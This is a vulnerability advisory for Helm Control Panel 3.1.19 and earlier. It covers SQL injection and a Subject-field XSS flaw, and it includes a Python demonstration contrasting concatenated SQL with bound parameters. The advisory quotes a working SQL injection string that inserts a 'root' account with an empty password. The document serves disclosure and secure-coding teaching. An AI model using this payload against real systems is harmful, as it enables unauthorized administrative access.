Helm Control Panel is reported prone to multiple vulnerabilities. These include an SQL injection issue and an HTML injection vulnerability. A remote attacker can execute arbitrary HTML and script code in a user's browser. Manipulation of SQL queries to reveal or corrupt sensitive database data is possible as well.
Helm Control Panel versions 3.1.19 and prior are reported vulnerable to these issues.
xxxx',10,0); insert into account(accountnumber,accounttype,accountpassword) values('root',0,'');--
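Why the string above succeeds against a concatenated statement and is inert when passed as a bound parameter, as an added example that is not Helm's code: the `entry` table, the INSERT statement and the function names are assumptions, and SQLite's `executescript` stands in for a database driver that accepts batched statements.

```python
import sqlite3

# String quoted in the advisory above, reproduced unchanged.
PAYLOAD = ("xxxx',10,0); insert into account(accountnumber,accounttype,"
           "accountpassword) values('root',0,'');--")


def make_db():
    """In-memory database: `account` uses the column names from the advisory;
    `entry` is a hypothetical table that receives the user-supplied value."""
    db = sqlite3.connect(":memory:")
    db.executescript(
        "create table account(accountnumber text, accounttype integer,"
        " accountpassword text);"
        "create table entry(name text, a integer, b integer);"
    )
    return db


def insert_unsafe(db, value):
    # Vulnerable pattern: the value becomes part of the statement text, so a
    # quote in it ends the literal and the rest is parsed as SQL.
    # executescript() models a driver that runs batched statements.
    db.executescript(
        "insert into entry(name, a, b) values('" + value + "', 1, 2)")


def insert_safe(db, value):
    # Bound parameter: the value is passed separately from the statement text
    # and is stored as data, quotes and semicolons included.
    db.execute("insert into entry(name, a, b) values(?, 1, 2)", (value,))
    db.commit()


def account_names(db):
    return [row[0] for row in db.execute("select accountnumber from account")]


def entry_names(db):
    return [row[0] for row in db.execute("select name from entry")]


if __name__ == "__main__":
    for insert in (insert_unsafe, insert_safe):
        db = make_db()
        insert(db, PAYLOAD)
        print(insert.__name__, "accounts:", account_names(db),
              "entries:", entry_names(db))
```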
Helm Control Panel Compose Message Form Subject Field XSS
Remote / Network Access
Loss of Integrity
Helm Web Hosting Control Panel contains a flaw that allows a remote cross-site scripting attack. This flaw exists because the application does not validate 'subject' variables upon submission to the compose message form's 'Subject' field. This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.
Upgrade to version 3.1.20 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.